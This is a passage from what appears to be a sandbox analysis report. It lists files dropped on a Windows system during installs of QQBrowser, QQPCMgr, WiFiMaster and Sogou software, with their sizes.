    %Documents and Settings%\%current user%\Local Settings\Temp\F.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\History-journal (39124 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000001 (75 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\etilqs_l9L1ZczXTKrKKpE (322 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_12442\10.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\OnlineSetup\sso-f1\QQBrowserOTA.exe (7386 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\1B.tmp (40 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Extension Rules\LOG (176 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1C.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\29.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Extension Rules\000001.dbtmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\22.tmp (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Login Data-journal (532 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\18.tmp (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\19.tmp (1 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\62B5AF9BE9ADC1085C3C56EC07A82BF6 (224 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\2F.tmp (61 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_9127\CRX_INSTALL\manifest.json (982 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_25493\CRX_INSTALL\manifest.json (795 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Current Session (1147 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\bak\Bookmarks.20160519101458.bak (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_25493\CRX_INSTALL\QBFixerForGJ.exe (32104 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_25493\CRX_INSTALL\QBFixerPlugin.dll (21288 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_25493\DECODED_IMAGES (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_25493\DECODED_MESSAGE_CATALOGS (24 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_9127\CRX_INSTALL\background.js (7288 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_9127\DECODED_MESSAGE_CATALOGS (24 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_9127\CRX_INSTALL\game-iframe.js (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_9127\CRX_INSTALL\background.html (91 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_9127\DECODED_IMAGES (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_9127\CRX_INSTALL\video-iframe.js (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8369\CRX_INSTALL\QQPCDetector.dll (43024 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8369\DECODED_MESSAGE_CATALOGS (24 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8369\DECODED_IMAGES (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8369\CRX_INSTALL\GJTipsPlugin.dll (20400 bytes)
    %System%\WIWFg4kt8m.log (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Tencent\Common\gjdatareport.dll (76 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Cab23.tmp (49 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8DFDF057024880D7A081AFBF6D26B92F (533 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\60E31627FDA0A46932B0E5948949F2A5 (933 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\60E31627FDA0A46932B0E5948949F2A5 (164 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (408 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (49 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.200\QBSafe.dll (1658 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\qrx13.tmp.qbl (48802 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F (176 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tar1F.tmp (2712 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Cab20.tmp (54 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tar24.tmp (2712 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.200\manifest.json (270 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\A89DFCC31C360BA5CBD616749B1B1C5D (152 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tar21.tmp (2712 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Cab1E.tmp (54 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\A89DFCC31C360BA5CBD616749B1B1C5D (140 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~82cd5\setup.xml (588 bytes)
    %Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\QQPCMgr_Setup.exe (3323635 bytes)
    %Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\version (684 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~82cd5\QQPCDownload.kui (1741 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~82cd5\QQPCDetector.dll (5257 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~82cd5\QQPCDownload.dll (9775 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~82cd5\qmdr\dr.dll (75 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\driver\TsQBDrvDll.dll (1328 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\locales\zh-CN.pak (216 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\locales\qb\zh-CN.pak (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\nsis_skin.gt (47 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\manifest.json (268 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.8\QBSafe.dll (1640 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\QRCode.dll (601 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\PrScrn.dll (7345 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\driver\amd64\tsqbdrv.sys (2015 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\qb_100_percent.pak (2105 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\tsurllib.dat (55 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\locales\qb\en-US.pak (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\resources.pak (139454 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\Default\Config Bookmarks (992 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\ExportFavHtml.dll (3361 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\qbroker\qbroker.exe (2285 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\F1Frame.dll (33015 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\xaml\InformationBox.xaml (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\QBInstaller.dll (6305 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.8\manifest.json (268 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\resources.pak (137723 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\xaml\InformationBox.xaml (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\QQBrowserLiveup.exe (7682 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Config Bookmarks (992 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\switch_core (25 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\tssafeedit.dat (1281 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\PepperFlash\pepflashplayer.dll (122894 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\qbroker\qbroker64.exe (4011 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\snapshot_blob.bin (3073 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\icudtl.dat (72895 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\chrome_child.dll (323648 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\locales\qb\zh-CN.pak (12 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\locales\qb\en-US.pak (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\chrome_elf.dll (94 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\navi.ico (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\History (204 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\qbroker\qbroker64.exe (2105 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}_1\manifest.json (268 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\qb_200_percent.pak (3085 bytes)
    %System%\drivers\TsQBDrv.sys (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\d3dcompiler_47.dll (43606 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\qb_200_percent.pak (5441 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\xaml\ClearDialog.xaml (1 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\TsService.exe.new (7385 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\libEGL.dll (1015 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\chrome.dll (257739 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\chrome_elf.dll (601 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\Downloader.dll (7726 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\UserPinnedTemp\QQ浏览器.lnk (2 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\History (1281 bytes)
    %Documents and Settings%\%current user%\Desktop\上网导航.lnk (1 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\腾讯软件\QQ浏览器\卸载QQ浏览器.lnk (1 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\service\TsService.exe.new (7385 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\BugReport.exe (3465 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\腾讯软件\QQ浏览器\QQ浏览器.lnk (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\extensions\commenExtension.crx (24 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\driver\TsQBDrvDll.dll (601 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\icudtl.dat (76782 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\navi.ico (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\chrome_200_percent.pak (9606 bytes)
    %Documents and Settings%\%current user%\Desktop\QQ浏览器.lnk (1 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\QQBrowserLiveup.exe (5441 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\uninst.exe (2105 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\tssafeedit.dat (198 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQBrowser\BugReport.exe (2321 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQBrowser\F1Assistant.dll (19686 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\locales\zh-CN.pak (1281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\9.3.7078.400.manifest (250 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\locales\en-US.pak (217 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\libexif.dll (3170 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\license.txt (17 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\locales\en-US.pak (1281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\PepperFlash\manifest.json (2 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\natives_blob_.bin (2321 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Liveup\Temp\QQBrowserLiveup.exe (5441 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\PrScrn.dll (9405 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\d3dcompiler_47.dll (23811 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\PrScrn.dll (7345 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\uninst.exe (2105 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\extensions\commenExtension.crx (24 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\natives_blob.bin (1720 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\ExportFavHtml.dll (5607 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\PepperFlash\pepflashplayer.dll (134257 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\snapshot_blob_.bin (3073 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\setup.log (205 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\nsis_skin.gt (47 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\libGLESv2.dll (10177 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\xaml\PicCheckDialog.xaml (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\dbghelper\dbghelp.dll (10210 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\driver\i386\tsqbdrv.sys (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\webp\WebpDecodeFilter.dll (1537 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\switch_core (14 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\QBUtils.dll (19686 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\F1Assistant.dll (25466 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\libGLESv2.dll (14287 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\compat.xml (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\dbghelper\dbgeng.dll (26869 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\MacroConfig.xml (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\QRCode.dll (302 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}.qrx (191 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\natives_blob.bin (2321 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe (4545 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}.qrx (673 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\PepperFlash\manifest.json (2 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\BugReport.exe (2321 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\driver\TsQBDrvDll.dll (601 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\chrome_200_percent.pak (12287 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\dbghelper\dbgeng.dll (24822 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\F1Frame.dll (30618 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\dbghelper\dbghelp.dll (7726 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\service\TsService.exe.new (5442 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\qqbrowser.exe (6962 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\CustomerJoinPlan.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\switch_core (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\uninst.exe (4018 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\chrome_child.dll (343608 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\compat.xml (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\Downloader.dll (10381 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\libEGL.dll (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\xaml\PicCheckDialog.xaml (1 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\9.3.7078.400.manifest (250 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\qqtrack.xml (5 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\qbroker\qbroker.exe (1425 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\driver\i386\tsqbdrv.sys (2527 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\webp\WebpDecodeFilter.dll (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\xaml\ClearDialog.xaml (1 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\chrome_100_percent.pak (7971 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\tsurllib.dat (55 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\qqtrack.xml (5 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\qqbrowser.exe (4545 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\navi.ico (104 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\driver\amd64\tsqbdrv.sys (601 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\libexif.dll (1425 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\QBSafe.dll (1640 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\snapshot_blob.bin (1795 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}_1\QBSafe.dll (1640 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\qb_100_percent.pak (1633 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\compat.xml (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\chrome.dll (509544 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\compat.xml (1 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\QQ浏览器.lnk (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\Config.xml (624 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\chrome_100_percent.pak (7386 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\app.ico (284 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\BugReport.exe (2321 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\QQ浏览器.lnk (1 bytes)
    %Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\F1Assistant.dll (19686 bytes)
    %Documents and Settings%\%current user%\Application Data\WiFiMaster\LocalConfigure.db (18929 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\继续使用 点击.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\完成按钮 未点击.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\点.png (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\自定义.png (984 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu6.tmp (730245 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\完成按钮 点击.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\继续使用 未点击.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\勾选 点击.png (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss8.tmp\SetupPlugin.dll (131925 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\取消.png (972 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\取消 未点击.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\icon.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\InstallPackages3.xml (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss8.tmp\FindProcDLL.dll (16944 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\快速安装不可点击.png (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\InstallPackages2.xml (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\最小化 未点击.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\快速安装 未点击.png (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\一键修复-正常.png (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\UninstallPackages.xml (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\关闭 未点击.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\进度条.png (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\确定卸载 点击.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\专家在线支持-经过.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\bg1.png (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\bg3.png (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\一键修复-经过.png (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\勾选 未点击.png (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\取消 点击.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\最小化 点击.png (3 bytes)
    %Documents and Settings%\%current user%\Application Data\WiFiMaster\LocalConfigure.db-journal (115866 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\btn2.png (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\btn1.png (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\勾选-点击_灰.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\关闭点击.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\确定卸载 未点击.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\背景图.png (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\BrowseWnd.xml (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\btn1_browse.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\bg2.png (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\专家在线支持-正常.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\专家在线支持-按下.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\一键修复-按下.png (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\进度条背景层.png (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\btn2_browse.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\快速安装 点击.png (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss17.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\SSO\SSOCommon.dll (41699 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss17.tmp\InstallHelper.dll (6584 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn16.tmp (78435 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\SSO\SSOPlatform.dll (48241 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\upgrade_stable_list_item.xml (5 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\button.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\continuebtn.png (819 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\edit.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\option_bk.png (1 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\white.png (163 bytes)
    %Program Files%\SogouSoftware\3.1.13.79\skin\PNG\9.png (18 bytes)
